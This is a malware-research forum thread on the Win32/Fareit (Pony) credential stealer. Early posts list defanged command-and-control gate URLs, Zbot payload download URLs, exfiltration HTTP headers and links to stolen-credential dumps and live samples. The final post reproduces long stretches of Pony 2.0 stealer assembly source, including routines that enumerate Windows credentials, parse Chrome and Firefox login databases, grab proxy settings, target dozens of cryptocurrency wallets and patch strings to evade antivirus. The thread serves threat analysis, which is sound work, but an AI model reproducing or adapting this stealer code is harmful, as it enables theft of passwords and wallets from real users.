Win32/Fareit

Forum for analysis and discussion about malware.

Re: Win32/Fareit

Postby unixfreaxjp » Tue Jul 30, 2013 5:13 pm

Spam campaign attachment:
Image
Download header used:
Code: Select all
GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s (Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0))

Credential posted to gates with below header format:
Code: Select all
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}

Access to facebook to the setting bars..
Code: Select all
2http://www.facebook.com/
abe2869f-9b47-4cd9-a358-c22904dba7f7
pSettings

aPlib cmpressor's trace:
Code: Select all
aPLib v1.01  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/

Pony gates:
Code: Select all
hxxp://webmail.alsultantravel.com:8080/forum/viewtopic.php
hxxp://alsultantravel.com:8080/forum/viewtopic.php
hxxp://webmail.alsultantravel.info:8080/forum/viewtopic.php
hxxp://198.57.130.35:8080/forum/viewtopic.php

Download Zbots:
Code: Select all
hxxp://198.57.130.35:8080/forum/viewtopic.php
hxxp://bremertondisciples.org/p6AERteJ.exe
hxxp://proactionpt.com/7dPmE3P.exe
hxxp://ruffledpaper.com/N7SvZ.exe

Assembly trace:
Code: Select all
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="5.1.0.0" processorArchitecture="x86" name="Progmn.Program_Code" type="win32"></assemblyIdentity><description>Program Description</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>

VT:
https://www.virustotal.com/en/file/9f06 ... /analysis/
Note:
credential list slurped is unchanged.
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Win32/Fareit

Postby unixfreaxjp » Tue Jul 30, 2013 5:22 pm

*) My post took too much space, I am sorry. I'll make shorter. The details which are same as previous posted will not be written here. Spam campaign again:
Image
Gates:
Code: Select all
hxxp://webmail.alsultantravel.com:8080/forum/viewtopic.php
hxxp://alsultantravel.com:8080/forum/viewtopic.php
hxxp://webmail.alsultantravel.info:8080/forum/viewtopic.php
hxxp://198.57.130.35:8080/forum/viewtopic.php

Zbots Downloads:
Code: Select all
hxxp://www.energiereise-namaste.de/EggT.exe
hxxp://www.labycar.com/Zi6L.exe
hxxp://208.112.50.5/c38QVmd.exe
hxxp://s148231503.onlinehome.us/y3R.exe

VT:
https://www.virustotal.com/en/file/4c10 ... /analysis/
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Win32/Fareit

Postby unixfreaxjp » Wed Jul 31, 2013 10:50 am

Three spams with fareit attachments as usual came in today:
The templates are as per below snapshots:
Image
VT:
https://www.virustotal.com/en/file/b2f7 ... /analysis/
https://www.virustotal.com/en/file/b2f7 ... /analysis/
https://www.virustotal.com/en/file/dfce ... /analysis/

The first and second posted credentials to below pony gates:
Code: Select all
h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://deltaoutriggercafe.com/ponyb/gate.php

and downloading these zbots:
Code: Select all
h00p://magic-crystal.ch/0ijiK8Y.exe
h00p://chartomresidence.com/j7qtsL.exe
h00p://ftp.petrasolutions.com/REXLa9.exe

the last one is posting creds to the below pony gates:
Code: Select all
h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://deltadazeresort.net/ponyb/gate.php
and downloading these zbots
Code: Select all
h00p://www.giftedintuitive.com/kQYjoPqY.exe
h00p://198.61.134.93/MM75.exe
h00p://ftp.jason-tooling.com/nhdx.exe
h00p://paulalfrey.com/guBwFA.exe

I took alive Zbots download URL snapshots w/URLquery, so people can use it as evidence for clean up purpose.
So far this is the list, use it at will: http://pastebin.com/raw.php?i=My0JHXGp
Sample can be downloaded via this: http://www.mediafire.com/?clcc8xrehg90qj8

#MalwareMustDie!!
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Win32/Fareit

Postby unixfreaxjp » Fri Aug 02, 2013 10:08 am

Today's campaign...As usual, no changes.
Image
VT: https://www.virustotal.com/en/file/71df ... 375431000/
Gates:
Code: Select all
h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://bettersigns.net/ponyb/gate.php
and download zbots from:
Code: Select all
h00p://ftp.evolplay.org/bzfBGWP.exe
h00p://www.giftedintuitive.com/kQYjoPqY.exe
h00p://198.61.134.93/MM75.exe
h00p://ftp.jason-tooling.com/nhdx.exe

FYI. Here's the credential data slurped: http://pastebin.com/raw.php?i=pxzThmHS
Sample to download: http://www.mediafire.com/?a18eybj053j38rf

#MalwareMustDie! (not a promotion, a share)
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Win32/Fareit

Postby patriq » Sat Jun 21, 2014 3:58 pm

Found something that appears to be Pony 2.0

http://protectyournet.blogspot.com/2014 ... er-20.html

Panel and samples attached. Samples are directly from this new builder.

What are your thoughts?
You do not have the required permissions to view the files attached to this post.
patriq
 
Posts: 109
Joined: Fri Jun 28, 2013 8:11 pm
Reputation point: 22

Re: Win32/Fareit

Postby wacked2 » Sun Jun 22, 2014 2:47 pm

The wallet stealers just use AppDataCommonFileScan.
The TDS feature in the panel is just a normal download command.
Still uses "Host:" and "Connection: close" with HTTP/1.0
It's still mainly a Multi Password Recovery mod.

(Haven't looked into the loader)
(Only partly analyzed, couldn't find a way to remove AntiDisasmTrick with IDA)
You do not have the required permissions to view the files attached to this post.
wacked2
 
Posts: 19
Joined: Sat Dec 17, 2011 3:25 pm
Reputation point: 5

Re: Win32/Fareit

Postby forty-six » Fri Jun 27, 2014 2:49 am

@patriq Looks like you weren't alone in that discovery:

https://blog.damballa.com/archives/2558

(from article)

Code: Select all
http://pastebin.com/k96W1bPy
forty-six
 
Posts: 66
Joined: Tue Sep 03, 2013 3:23 pm
Reputation point: 30

Re: Win32/Fareit

Postby Xylitol » Fri Jun 27, 2014 1:10 pm

Here is some code modifications i've spotted on the 2.0 compared with 1.9 stub source
May i've missed some part, but most of the modifications are here i think.
PasswordModules.asm:
Code: Select all
Line 11 (remove of an useless .code, and definitions added):
ITEMHDR_ID               equ 0beef0000h

Line 109 (code addition):
MODULE_BITCOIN            equ 00000061h
MODULE_ELECTRUM            equ 00000062h
MODULE_MULTIBIT            equ 00000063h
MODULE_FTPDISK            equ   00000064h
MODULE_LITECOIN            equ   00000065h
MODULE_NAMECOIN            equ   00000066h
MODULE_TERRACOIN         equ 00000067h
MODULE_BITCOINARMORY      equ 00000068h
MODULE_PPCOIN            equ 00000069h
MODULE_PRIMECOIN         equ 0000006ah
MODULE_FEATHERCOIN         equ 0000006bh
MODULE_NOVACOIN            equ 0000006ch
MODULE_FREICOIN            equ 0000006dh
MODULE_DEVCOIN            equ 0000006eh
MODULE_FRANKOCOIN         equ 0000006fh
MODULE_PROTOSHARES         equ 00000070h
MODULE_MEGACOIN            equ 00000071h
MODULE_QUARKCOIN         equ 00000072h
MODULE_WORLDCOIN         equ 00000073h
MODULE_INFINITECOIN         equ 00000074h
MODULE_IXCOIN            equ 00000075h
MODULE_ANONCOIN            equ 00000076h
MODULE_BBQCOIN            equ 00000077h
MODULE_DIGITALCOIN         equ 00000078h
MODULE_MINCOIN            equ 00000079h
MODULE_GOLDCOIN            equ 0000007ah
MODULE_YACOIN            equ 0000007bh
MODULE_ZETACOIN            equ 0000007ch
MODULE_FASTCOIN            equ 0000007dh
MODULE_I0COIN            equ 0000007eh
MODULE_TAGCOIN            equ 0000007fh
MODULE_BYTECOIN            equ 00000080h
MODULE_FLORINCOIN         equ 00000081h
MODULE_PHOENIXCOIN         equ 00000082h
MODULE_LUCKYCOIN         equ 00000083h
MODULE_CRAFTCOIN         equ 00000084h
MODULE_JUNKCOIN            equ 00000085h


; collect proxy settings stored in browsers (HTTP/HTTPS password grabbing must be enabled in builder!)
COLLECT_PROXY_SETTINGS      equ 1

Line 198 (just a procedure rename):
invoke   IsDataAlreadyProcessed, map.lpMem, map.dwFileSize
               
Line 235 (just to match the procedure rename):
IsFileAlreadyProcessed proc uses ebx path
Line 248 (just to match the procedure rename):
invoke   IsDataAlreadyProcessed, map.lpMem, map.dwFileSize
Line 261 (just to match the procedure rename):
IsFileAlreadyProcessed endp

Line 442:
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Windows (WinInet) Proxy Settings (used for IE and Chrome based browsers)
; SFTP: not supported

.data
   CProxySettingsRegPath               db   'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
   CProxySettingsRegValue               db   'ProxyServer',0

.code

IFDEF COLLECT_PROXY_SETTINGS

GrabProxySettings proc stream, item_id
   LOCAL   len: DWORD
   LOCAL   mem: DWORD

   mov   len, 0
   invoke   RegReadValueStr, dwCurrentUserKey, offset CProxySettingsRegPath, offset CProxySettingsRegValue, addr len
   .IF   eax
      mov   mem, eax   
      invoke   CommonAppendDataStr, stream, mem, item_id
      invoke   MemFree, mem      
   .ENDIF

   ret
GrabProxySettings endp

ENDIF

Line 476 (code clean-up):
the .data containing this vanished:
   szHWIDValue      db   "HWID",0
   szGUIDFmt      db   "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",0

   win64_getnative      db   "GetNativeSystemInfo",0
   win64_kernel      db   "kernel32.dll",0
   win64_process      db   "IsWow64Process",0

IsWin64 procedure vanished from the code but is called line 518
IsAdmin procedure vanished from the code but is called line 533
InstallHWIDValue procedure vanished from the code but is called line 537

Line 591 (2 comments added):
; Tested: Far Manager v3.0 build 3367 x86
; Tested: Far Manager v3.0 build 3525 x86

Line 747 (comment added for the Windows/Total Commander proc):
; Tested: 8.01 64 bit (Release)

Line 837 (code added, Windows/Total Commander proc):
   mov byte ptr[CWTCIni], 'w'
   mov   byte ptr[CWTCRegPath1+9], 'G'
   mov   byte ptr[CWTCRegPath2+9], 'G'

Line 927 (comment added):
; Tested: WS_FTP Pro 12.4

Line 1123 (added definition for CuteFTP 9):
CCuteFTP_RegPath7   db   "Software\GlobalSCAPE\CuteFTP 9\QCToolbar",0
Line 1286 (added definition for CuteFTP 9):
invoke   CuteFTPProcessQuickConnections, stream, offset CCuteFTP_RegPath7

Line 1306 (no idea if it's bugfix or error in my 1.9 package)
anyway this concern just a letter fix for path name in FlashFXP dirs not really a major change (if this is one)

Line 1378 (code/comment addition):
   ; AV-FIXes
   mov   byte ptr[CFlashFXP_RegPath1], 'S'
   mov   byte ptr[CFlashFXP_RegPath2], 'S'
   mov   byte ptr[CFlashFXP_RegPath3], 'S'
   mov   byte ptr[CFlashFXP_HistoryName+1], 'H'
   
Line 1812 (code addition):
   mov   byte ptr[CSmartFTPHistMask], 'H'
   
Line 1868 (code addition):
   mov   byte ptr[CTurboFTPDatMask], 'a'

Line 3747 (comment addition):
; Tested: 16.0.1196.73 (Chrome based)

Line 3767 (code addition):
   COperaNewAppDataDir   db   '\Opera Software',0

Line 4219 (procedure rename, refere to line 198):
invoke   IsFileAlreadyProcessed, lpFileName

Line 4408 (code addition):
ChromeCommonScanCustomID proto :DWORD, :DWORD, :DWORD

Line 4447 (code addition):
invoke   ChromeCommonScanCustomID, stream, offset COperaNewAppDataDir, ITEMHDR_ID or 2

Line 4599 (comment edit):
; FTP Voyager 11.x-16.x
Line 4601: (comment edit):
; Tested: Version 16.1.0.0
Line 4610: (code addition):
   CFTPVoyagerProfileFile2   db   'FTPVoyager.ftp.backup',0
   CFTPVoyagerProfileFile3   db   'FTPVoyager.ftp.old.backup',0

Line 4623 (code addition):
      push   eax
      push   eax
      invoke   CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile1, ITEMHDR_ID or 0
      pop   eax
      invoke   CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile2, ITEMHDR_ID or 0
      pop   eax
      invoke   CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile3, ITEMHDR_ID or 0

Line 4703 (code delete):
szSQLite3Imports vanished

Line 4726 (code delete):
szSQLiteMozillaQuery vanished

Line 4737: (code added):
   IFDEF   COLLECT_PROXY_SETTINGS
   szMozillaProxy      db   'moz-proxy://',0
   ENDIF

Line 4896 (code deletion/addition):
MozillaReadSQLColData whole procedure replaced by: ProcessMozillaSQLiteFile proto :DWORD, :DWORD, :DWORD

Line 4898 (code deletion):
Removed into the MozillaReadSQLFile proc the DWORD definitions

line 4904 (procedure rename, refere to line 198):
invoke   IsFileAlreadyProcessed, szSQLFile

Line 4915 (comment added/code deleted)
; Process SQLite3 database using tiny db engine
LoadDllImports vanished replaced by:    invoke   ProcessMozillaSQLiteFile, stream, szSQLFile, ITEMHDR_ID or 0

Line 4917 (additional code remove about the sqlite3 db)

Line 4967 (procedure rename, refere to line 198):
   invoke   IsFileAlreadyProcessed, szSignonsFile

Line 5071 (code addition):
   IFDEF   COLLECT_PROXY_SETTINGS
   .IF   eax
      invoke   lstrlen, offset szMozillaProxy
      invoke   StrCmpNI, host_line, offset szMozillaProxy, eax
   .ENDIF

Line 5212 (code addition):
   IFDEF COLLECT_PROXY_SETTINGS
      invoke   StrStrI, ininame, offset szMozillaPrefsJS
      .IF   eax
         invoke   PonyStrCat, dir, offset szSlash
         invoke   PonyStrCatFreeArg1, eax, ininame
         push   eax
         invoke   CommonAppendFile, stream, eax, ITEMHDR_ID or 1
         call   MemFree
      .ENDIF
   ENDIF

Line 61008 (procedure added):
PSExportAUser proc dwType, lpName, lpUser, pData, pDataLen, stream
   invoke   StreamWriteDWORD, stream, dwType

   invoke   lstrlenA, lpName
   inc   eax ; NULL

   invoke   StreamWriteBinaryString, stream, lpName, eax
   invoke   StreamWriteBinaryString, stream, pData, pDataLen

   invoke   lstrlenA, lpUser
   inc   eax ; NULL

   invoke   StreamWriteBinaryString, stream, lpUser, eax
   ret
PSExportAUser endp

Line 6418 (code addition):
szIE7CredAll   db   '*',0
Line 6420 (code addition):
szIE7Comment   db   'SspiPfc',0

Line 6498 (code addition):
   IFDEF COLLECT_PROXY_SETTINGS
      .IF   MyCredFree && MyCredEnumerate && MyCryptUnprotectData
         mov   pCred, NULL
         mov   Count, 0
         lea   eax, pCred
         push   eax
         lea   eax, Count
         push   eax
         push   0
         push   offset szIE7CredAll
         call   MyCredEnumerate
         .IF   eax && Count && pCred
            mov   esi, pCred
            .WHILE   Count && dword ptr[esi]
               push   esi
               mov   esi, dword ptr[esi]

               invoke   lstrcmpi, dword ptr[esi].CREDENTIAL._Comment, offset szIE7Comment
               .IF   !eax
                  m2m   InBlob.cbData, dword ptr[esi].CREDENTIAL.CredentialBlobSize
                  m2m   InBlob.pbData, dword ptr[esi].CREDENTIAL.CredentialBlob
                  
                  .IF   InBlob.cbData
                     invoke   PSExportAUser, ITEMHDR_ID or 6, [esi].CREDENTIAL.TargetName, [esi].CREDENTIAL.UserName, InBlob.pbData, InBlob.cbData, stream
                     invoke   LocalFree, OutBlob.pbData
                  .ENDIF
               .ENDIF

               pop   esi
               dec   Count
               add   esi, 4
            .ENDW
            push   pCred
            call   MyCredFree
         .ENDIF
      .ENDIF
   ENDIF
   
Line 6547 (code addition):
   IFDEF COLLECT_PROXY_SETTINGS
      invoke   GrabProxySettings, stream, ITEMHDR_ID or 5
   ENDIF

Line 6929 (code addition):
ELSEIFDEF COMPILE_MODULE_OPERA
   COMPILE_CHROMIUM_CODE   equ   1
Line 6934 code addition):
   COMPILE_SQLITE3_CODE   equ   1
ELSEIFDEF COMPILE_MOZILLA_CODE
   COMPILE_SQLITE3_CODE   equ   1
ENDIF

IFDEF COMPILE_SQLITE3_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Line 6945 (code addition):
   CChromeWebData      db   'Web Data',0
   CChromeLoginData   db   'Login Data',0
   
Line 6953 (code deletion):
deleted some datas related to chrome (szChromeLoginTable, szChromeActionURL, szChromePassValue, [...] szChromeHTTPS   

Line 6956 (code deletion):
dwChromeActionURL, dwChromePassValue, dwChromeUserValue
   
Line 7163 (line replace):
mov   eax, TRUE -> invoke   SQLiteBuildDataRecord, NULL, 0, SQLITE_DATATYPE_OTHER, lpDataOut

Line 7229 (comment edition):
; Get data length & pointer for a single cell from 1-dim record array

Line 7378 (code edition):
added 'item_id' into the SQLiteReadPage proc
Line 7488 (code edition):
Same edition as line 7378.
   
Line 7578 (code addition):
push   item_id
   
Line 7596 (code deletion):
Process SQL column definitions
   
Line 7598 (code edition):
added callback_func to SQLiteProcessSQL procedure

Line 7608 (instruction added):
cld

Line 7665 (comment edition):
; Replace double space chars to single space chars ('  ' -> ' ')

Line 7681 (comment edition):
; Process column definitions one by one

Line 7688 (code edition):
replaced invoke SQLiteProcessCol by:
         push   nCol
         push   esi
         call   callback_func
         
Line 7700 (code edition):
same edition as line 7688.

Line 7707 (code addition):
ProcessSQLiteStream proc stream, target_stream, item_id, callback_func
   LOCAL   header[16]: BYTE
   LOCAL   dwStatusCode: DWORD
   
   ; Read database header
   
   invoke   StreamGotoBegin, stream
   invoke   StreamRead, stream, addr header, sizeof header
   .iF   !eax
      ret
   .ENDIF
   
   invoke   CompareMem, addr header, offset szSQLite3Header, sizeof header
   .IF   !eax
      ret
   .ENDIF

   mov   dwStatusCode, TRUE
   invoke   Stream_SafeReadWORD, stream, addr dwStatusCode
   .IF   !eax || !dwStatusCode
      sub   eax, eax
      ret
   .ENDIF
   
   ; Validate page size
   push   eax
   sub   ecx, ecx
   .WHILE   eax
      shr   eax, 1
      .IF   CARRY?
         inc   ecx
      .ENDIF
   .ENDW
   pop   eax
   
   .IF   eax == 1
      mov   eax, 65536
   .ENDIF
   
   ; Page size must be power of 2
   .IF   ecx != 1
      sub   eax, eax
      ret
   .ENDIF
   mov   dwSQLitePageSize, eax

   ; File format write version
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   ((eax != 1) && (eax != 2)) || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; File format read version
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   ((eax != 1) && (eax != 2)) || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF
   
   ; Reserved bytes
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 0 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; Maximum embedded payload fraction
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 64 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; Minimum embedded payload fraction
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 32 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF
   
   ; Leaf payload fraction
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 32 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF
   invoke   Stream_SafeReadSkip, stream, 4*8, addr dwStatusCode
   
   ; Database text encoding
   invoke   Stream_SafeReadDWORD, stream, addr dwStatusCode
   .IF   (eax < 1) || (eax > 3) || (!dwStatusCode)
      sub   eax, eax
      ret
   .ENDIF
   
   mov   dwSQLiteEncoding, eax
   
   invoke   Stream_SafeReadSkip, stream, 40, addr dwStatusCode
   
   ; Start database processing from page 1
   invoke   SQLiteReadPage, stream, target_stream, 1, addr dwStatusCode, item_id, callback_func
   
   ret
ProcessSQLiteStream endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common chromium decryption

IFDEF COMPILE_CHROMIUM_CODE

.data
   CChromeWebData      db   'Web Data',0
   CChromeLoginData   db   'Login Data',0
   szChromeLoginTable    db   'logins',0
   szChromeActionURL   db   'origin_url',0
   szChromePassValue   db   'password_value',0
   szChromeUserValue   db   'username_value',0
   szChromeFTP         db   'ftp://',0
   IFDEF   GRAB_HTTP
   szChromeHTTP      db   'http://',0
   szChromeHTTPS      db   'https://',0
   ENDIF

.data?
   dwChromeActionURLIndex   dd   ?
   dwChromePassValueIndex   dd   ?
   dwChromeUserValueIndex   dd   ?
.code

; Process SQL column definition
SQLiteProcessChromeColDef proc uses edi column_definition, column_index
   invoke   Trim, column_definition
   invoke   StrStrI, column_definition, offset szSQLiteSpaceChar
   .IF   !eax
      ret
   .ENDIF
   mov   byte ptr[eax], 0
   invoke   Trim, column_definition
   
   mov   edi, offset szSQLiteStopWords
@@:
   invoke   lstrcmpi, edi, column_definition
   .IF   !eax
      ret
   .ENDIF
   @Next   @B
   
   invoke   lstrlen, column_definition
   .IF   !eax
      ret
   .ENDIF
   
   invoke   lstrcmpi, column_definition, offset szChromeActionURL
   .IF   !eax
      m2m   dwChromeActionURLIndex, column_index
   .ENDIF
   
   invoke   lstrcmpi, column_definition, offset szChromePassValue
   .IF   !eax
      m2m   dwChromePassValueIndex, column_index
   .ENDIF

   invoke   lstrcmpi, column_definition, offset szChromeUserValue
   .IF   !eax
      m2m   dwChromeUserValueIndex, column_index
   .ENDIF

   mov   eax, TRUE
   ret
SQLiteProcessChromeColDef endp
; Process chrome password data row
SQLiteProcessChromeDataTable proc uses esi edi stream, target_stream, row_array, cell_count, item_id

Line: 7904 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
dwChromePassValue -> dwChromePassValueIndex
dwChromeUserValue -> dwChromeUserValueIndex

Line 7906 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
Line 7907 (line edition):
dwChromePassValue -> dwChromePassValueIndex
Line 7908 (line edition):
dwChromeUserValue -> dwChromeUserValueIndex

Line 7960 (line edition):
ITEMHDR_ID or 0 -> item_id

Line 7974 (line edition):
SQLiteProcessDataTable endp -> SQLiteProcessChromeDataTable endp

Line 7985 (line edition):
SQLiteProcessSchemaTable -> SQLiteProcessChromeSchemaTable

Line 8011 code edition):
mov   dwChromeActionURL, -1 -> mov dwChromeActionURLIndex, -1
Line 8012 code edition):
mov   dwChromePassValue, -1 -> mov dwChromePassValueIndex, -1
Line 8013 code edition):
mov   dwChromeUserValue, -1 -> mov dwChromeUserValueIndex, -1

Line 8015 (line edition):
invoke   SQLiteProcessSQL, cell_data, offset SQLiteProcessChromeColDef

Line 8018 (code edition):
.IF   (dwChromeActionURLIndex != -1) && (dwChromePassValueIndex != -1) && (dwChromeUserValueIndex != -1)
Line 8019 (code edition):
invoke   SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessChromeDataTable

Line 8029 (procedure rename):
SQLiteProcessChromeSchemaTable endp

Line 8031 (procedure modification):
ProcessChromeSQLiteFile proc target_stream, szSQLFileName, item_id
   LOCAL   stream: DWORD

   invoke   StreamCreate, addr stream
   invoke   StreamLoadFromFile, szSQLFileName, stream
   .IF   eax
      invoke   ProcessSQLiteStream, stream, target_stream, item_id, offset SQLiteProcessChromeSchemaTable
      .IF   !eax
         ; Error occured while processing ".sqlite" file
         ; Send ".sqlite" file for debugging
         ;invoke   CommonAppendFileForceDupe, target_stream, lpFileName, ITEMHDR_ID or 1000h
      .ENDIF

Line 8029 (just a renamed of the end of the proc.):
SQLiteProcessChromeSchemaTable endp

Line 8031 (rewrote of the proc):
ProcessChromeSQLiteFile proc target_stream, szSQLFileName, item_id
   LOCAL   stream: DWORD

   invoke   StreamCreate, addr stream
   invoke   StreamLoadFromFile, szSQLFileName, stream
   .IF   eax
      invoke   ProcessSQLiteStream, stream, target_stream, item_id, offset SQLiteProcessChromeSchemaTable
      .IF   !eax
         ; Error occured while processing ".sqlite" file
         ; Send ".sqlite" file for debugging
         ;invoke   CommonAppendFileForceDupe, target_stream, lpFileName, ITEMHDR_ID or 1000h
      .ENDIF

Line 8044 (code addition):
invoke   StreamFree, stream

Line 8046 (proc code addition):
   ret
ProcessChromeSQLiteFile endp

ChromeAppDataCommonSingleFileScan proc stream, csidl, appdata_dir, config_file, item_id
   invoke   SHGetFolderPathStr, csidl
   .IF   eax
      invoke   PonyStrCatFreeArg1, eax, appdata_dir
      push   eax
      invoke   CommonFileScanCallback, stream, eax, config_file, item_id, offset ProcessChromeSQLiteFile
      call   MemFree

Line 8057 (code addition):
   ret
ChromeAppDataCommonSingleFileScan endp

Line 8060 (proc code addition):
ChromeCommonScanCustomID proc stream, base_appdata_dir, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeWebData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeWebData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeWebData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeLoginData, id
   ret
ChromeCommonScanCustomID endp

ChromeCommonScan proc stream, base_appdata_dir
   invoke   ChromeCommonScanCustomID, stream, base_appdata_dir, ITEMHDR_ID or 0
   ret
ChromeCommonScan endp

ENDIF

IFDEF COMPILE_MOZILLA_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common Mozilla SQLite3 database decryption

.data
   szMozillaLoginTable db   'moz_logins',0
   szMozillaActionURL   db   'hostname',0
   szMozillaPassValue   db   'encryptedPassword',0
   szMozillaUserValue   db   'encryptedUsername',0

.data?
   dwMozillaActionURLIndex   dd   ?
   dwMozillaPassValueIndex   dd   ?
   dwMozillaUserValueIndex   dd   ?

.code

; Process SQL column definition
SQLiteProcessMozillaColDef proc uses edi column_definition, column_index
   invoke   Trim, column_definition
   invoke   StrStrI, column_definition, offset szSQLiteSpaceChar
   .IF   !eax
   
Line 8102 (code addition):
   mov   byte ptr[eax], 0
   invoke   Trim, column_definition

Line 8105 (code addition/deletion):
   mov   edi, offset szSQLiteStopWords
@@:
   invoke   lstrcmpi, edi, column_definition
   .IF   !eax

line 8113 (code addition/deletion):
invoke   lstrlen, column_definition
   .IF   !eax

Line 8118 (code addition/remove):
   invoke   lstrcmpi, column_definition, offset szMozillaActionURL
   .IF   !eax
      m2m   dwMozillaActionURLIndex, column_index
      
Line 8123 (code addition/remove):
   invoke   lstrcmpi, column_definition, offset szMozillaPassValue
   .IF   !eax
      m2m   dwMozillaPassValueIndex, column_index

Line 8128 (code addition/deletion):
   invoke   lstrcmpi, column_definition, offset szMozillaUserValue
   .IF   !eax
      m2m   dwMozillaUserValueIndex, column_index

Line 8133 (code addition/deletion):
   mov   eax, TRUE
   ret
SQLiteProcessMozillaColDef endp

; Process password data row
SQLiteProcessMozillaDataTable proc stream, target_stream, row_array, cell_count, item_id
   LOCAL   url_cell_len: DWORD
   LOCAL   url_cell_type: DWORD
   LOCAL   url_cell_data: DWORD
   LOCAL   user_cell_len: DWORD
   LOCAL   user_cell_type: DWORD
   LOCAL   user_cell_data: DWORD
   LOCAL   pass_cell_len: DWORD
   LOCAL   pass_cell_type: DWORD
   LOCAL   pass_cell_data: DWORD
   LOCAL   host: DWORD
   LOCAL   user: DWORD
   LOCAL   pass: DWORD

   .IF   !cell_count

Line 8155 (code addition/deletion):
   mov   eax, cell_count
   .IF   (dwMozillaActionURLIndex < eax) && (dwMozillaPassValueIndex < eax) && (dwMozillaUserValueIndex < eax)
      ; Get cell values
      invoke   SQLiteGetRecordArrayCell, row_array, dwMozillaActionURLIndex, addr url_cell_len, addr url_cell_type, addr url_cell_data
      invoke   SQLiteGetRecordArrayCell, row_array, dwMozillaUserValueIndex, addr user_cell_len, addr user_cell_type, addr user_cell_data
      invoke   SQLiteGetRecordArrayCell, row_array, dwMozillaPassValueIndex, addr pass_cell_len, addr pass_cell_type, addr pass_cell_data

      .IF   url_cell_len && pass_cell_len
         mov   edx, url_cell_len
         inc   edx
         invoke   MemAlloc, edx
         mov   host, eax
